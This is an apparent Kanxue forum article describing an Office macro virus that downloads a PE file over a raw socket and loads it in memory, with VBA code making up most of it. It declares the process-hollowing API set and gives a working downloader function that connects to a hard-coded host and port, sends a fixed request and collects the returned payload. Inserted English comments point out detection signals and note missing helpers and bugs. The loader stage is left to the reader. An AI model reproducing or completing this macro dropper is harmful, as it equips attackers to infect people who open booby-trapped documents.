一个远程下载并内存加载PE的office宏病毒
本文为看雪论坛优秀文章
一 • 引言
二 • 需求分析与初步设计
三 • 部分实现
首先需要对所需的函数进行声明,对结构体进行定义,我在这里花费了很长时间,对所有函数的声明如下,其中包含了32位与64位:
' Win32 API declarations used by the macro. The Win64 branch uses PtrSafe
' with LongPtr/LongLong for pointer- and handle-sized arguments; the Win32
' branch is the legacy 32-bit form. Declaring both lets the same module
' compile under either Office bitness.
' Defender note: the API set declared here - raw WinSock (socket/connect/
' send/recv) alongside CreateProcess, NtUnmapViewOfSection, VirtualAllocEx,
' WriteProcessMemory, Get/SetThreadContext and ResumeThread - is the
' well-known process-hollowing import combination. Static macro scanners
' can key on this combination of Declare lines; at runtime, an Office host
' process opening a TCP socket and then creating and writing into another
' process is a high-confidence EDR/ETW signal.
' Only the WinSock declarations are exercised by the GetCode function shown
' later in this page; the process-manipulation APIs are declared but never
' called in the visible excerpt.
' NOTE(review): CopyMemory is declared as a Sub on Win64 but as a Function
' returning Long on Win32, although it aliases the same RtlMoveMemory.
' VarPtrArray (the VBE7 runtime's VarPtr) exists only in the 32-bit branch.
' STARTUPINFO, PROCESS_INFORMATION and CONTEXT are referenced by the
' CreateProcess/*ThreadContext declarations but are not defined in this
' excerpt (the article says the remaining structure definitions are omitted).
#If Win64 Then
Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long
Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long
Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
' The following kernel32/ntdll declarations are the process-manipulation set
' (not used by the visible code).
Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long
Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
' 32-bit equivalents of the declarations above (all handles/pointers As Long).
Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long
Public Declare Sub WSACleanup Lib "ws2_32.dll" ()
Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long
Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long
Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long
Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
有了以上定义的函数,还需要定义一些结构体,其中包括socket通信需要用到的结构体与PE文件结构需要用到的结构体
socket通信结构体:
' WinSock structures, duplicated per bitness. The two branches differ only in
' the width of the pointer-typed fields (LongLong on Win64, Long on Win32).
' WSADATA is filled in by WSAStartup; ADDRINFO is the node type of the linked
' list returned by getaddrinfo (ai_next chains to the next node).
' WSADESCRIPTION_LEN is used as an array bound here but is not defined in
' this excerpt; it must come from elsewhere in the module.
#If Win64 Then
Private Type WSADATA
wVersion As Integer
wHighVersion As Integer
szDescription(0 To WSADESCRIPTION_LEN) As Byte
szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As LongLong
End Type
Private Type ADDRINFO
ai_flags As Long
ai_family As Long
ai_socktype As Long
ai_protocol As Long
ai_addrlen As Long
ai_canonName As LongLong 'strptr
ai_addr As LongLong 'p sockaddr
ai_next As LongLong 'p addrinfo
End Type
#Else
Private Type WSADATA
wVersion As Integer
wHighVersion As Integer
szDescription(0 To WSADESCRIPTION_LEN) As Byte
szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As Long
End Type
Private Type ADDRINFO
ai_flags As Long
ai_family As Long
ai_socktype As Long
ai_protocol As Long
ai_addrlen As Long
ai_canonName As Long 'strptr
ai_addr As Long 'p sockaddr
ai_next As Long 'p addrinfo
End Type
#End If
一些需要用到的枚举量:
' Address-family constants passed to socket()/getaddrinfo(). GetCode below
' uses AF_UNSPEC so that getaddrinfo may return IPv4 or IPv6 candidates.
Enum AF
AF_UNSPEC = 0
AF_INET = 2
AF_IPX = 6
AF_APPLETALK = 16
AF_NETBIOS = 17
AF_INET6 = 23
AF_IRDA = 26
AF_BTH = 32
End Enum
' Socket-type constants; GetCode below requests SOCK_STREAM (TCP).
Enum sock_type
SOCK_STREAM = 1
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
End Enum
PE文件结构体太多了就不写了,按照上面的那种格式与类型写就可以。
下载函数如下:
' Downloader stage: opens a TCP connection to a hard-coded host/port, sends a
' fixed 5-byte request, reads the reply until the peer closes the connection
' and returns the collected bytes. The function has no declared return type,
' so the result is a Variant holding a Byte array (or Empty on the early
' exits). The article states the bytes are then loaded as a PE image; that
' stage is not part of this excerpt.
' Depends on MAKEWORD, LogError, INVALID_SOCKET and SOCKET_ERROR, none of
' which are defined in the visible code.
' Defender note: every network indicator in this sample is a constant -
' destination "127.0.0.1" port "9593" (a loopback test target here; a
' deployed variant would carry its real server) and the fixed request bytes
' 32,42,42,5,6 (hex 20 2A 2A 05 06) sent before anything is read. The raw
' ws2_32 socket is opened from the Office host process itself, which is
' unusual for a document and is a good process/network-correlation rule.
Function GetCode()
Dim m_wsaData As WSADATA
Dim m_RetVal As Integer
Dim m_Hints As ADDRINFO
Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET
Dim Server As String
Dim port As String
#If Win64 Then
Dim pAddrInfo As LongLong
#Else
Dim pAddrInfo As Long
#End If
Dim RetVal As Long
Dim lastError As Long
' Initialise WinSock 2.2; every failure path below calls WSACleanup and
' leaves GetCode with no return value.
RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
If (RetVal <> 0) Then
LogError "WSAStartup failed with error " & RetVal, WSAGetLastError()
Call WSACleanup
Exit Function
End If
' Resolve the target with getaddrinfo (any address family, TCP).
m_Hints.ai_family = AF.AF_UNSPEC
m_Hints.ai_socktype = sock_type.SOCK_STREAM
Server = "127.0.0.1"
port = "9593"
RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo)
If (RetVal <> 0) Then
LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError()
Call WSACleanup
Exit Function
End If
' Walk the returned ADDRINFO list by copying each node over m_Hints and
' try socket()+connect() on each candidate until one succeeds.
' NOTE(review): the list from getaddrinfo is never released (no
' freeaddrinfo is declared in this module).
m_Hints.ai_next = pAddrInfo
Dim connected As Boolean: connected = False
Do While m_Hints.ai_next > 0
'Do While 1
CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)
m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol)
If (m_ConnSocket = INVALID_SOCKET) Then
LogError "Error opening socket, error " & RetVal
Else
Dim connectionResult As Long
connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)
If connectionResult <> SOCKET_ERROR Then
connected = True
Exit Do
End If
LogError "connect() to socket failed"
closesocket (m_ConnSocket)
End If
Loop
If Not connected Then
LogError "Fatal error: unable to connect to the server", WSAGetLastError()
Call WSACleanup
Exit Function
End If
'Dim SendBuf() As Byte
'SendBuf = StrConv("Message #1", vbNarrow)
' send request: the constant byte sequence below is the only thing sent.
Dim dataBuf As Variant
dataBuf = Array(32, 42, 42, 5, 6)
Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1
Dim sendBuf() As Byte
ReDim sendBuf(dataLen)
' copy the Variant array into a Byte array and print the bytes being sent
Dim i As Long
For i = 0 To dataLen - 1
sendBuf(i) = dataBuf(i)
Debug.Print sendBuf(i);
Next i
RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0)
If RetVal = SOCKET_ERROR Then
LogError "send() failed", WSAGetLastError()
Call WSACleanup
Exit Function
Else
Debug.Print "sent " & RetVal & " bytes"
End If
' receive reply: read in 32-byte chunks and append to payloadBuf until
' recv returns 0 (peer closed) or a negative value (error); the two cases
' are not distinguished here - both simply end the loop.
Dim payloadBuf() As Byte
Dim recvBuf() As Byte
Dim recvSize As Integer: recvSize = 32
ReDim recvBuf(recvSize)
Dim recvLen As Integer: recvLen = 0
Dim index As Long: index = 0
Do While 1
recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0)
'For i = 0 To recvLen - 1
' Debug.Print recvBuf(i);
'Next i
'Debug.Print
If recvLen > 0 Then
' grow the payload buffer in place and copy the chunk in
ReDim Preserve payloadBuf(index + recvLen)
Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen)
index = index + recvLen
Else
Exit Do
End If
Loop
' print the received length
' NOTE(review): if no bytes were received, payloadBuf was never ReDim'd and
' the UBound call below raises a run-time error.
Debug.Print "接收到的长度为:";
Debug.Print UBound(payloadBuf) - LBound(payloadBuf)
'Debug.Print "接收到的数据为:";
'For i = 0 To index - 1
' Debug.Print payloadBuf(i); 'a trailing ";" keeps Debug.Print on the same line
'Next i
'Debug.Print
' Close the socket. WSACleanup is only invoked on the failure path here;
' on success the WinSock session is left initialised.
RetVal = closesocket(m_ConnSocket)
If RetVal <> 0 Then
LogError "closesocket() failed", WSAGetLastError()
Call WSACleanup
Else
Debug.Print "closed socket"
End If
GetCode = payloadBuf
End Function
以上便是下载部分的大概思路与代码,内存加载部分感兴趣可以自己实现一下,难度主要在结构体的定义部分。
四 • 结语
看雪ID:某警官
https://bbs.pediy.com/user-home-856450.htm
*本文由看雪论坛 某警官 原创,转载请注明来自看雪社区。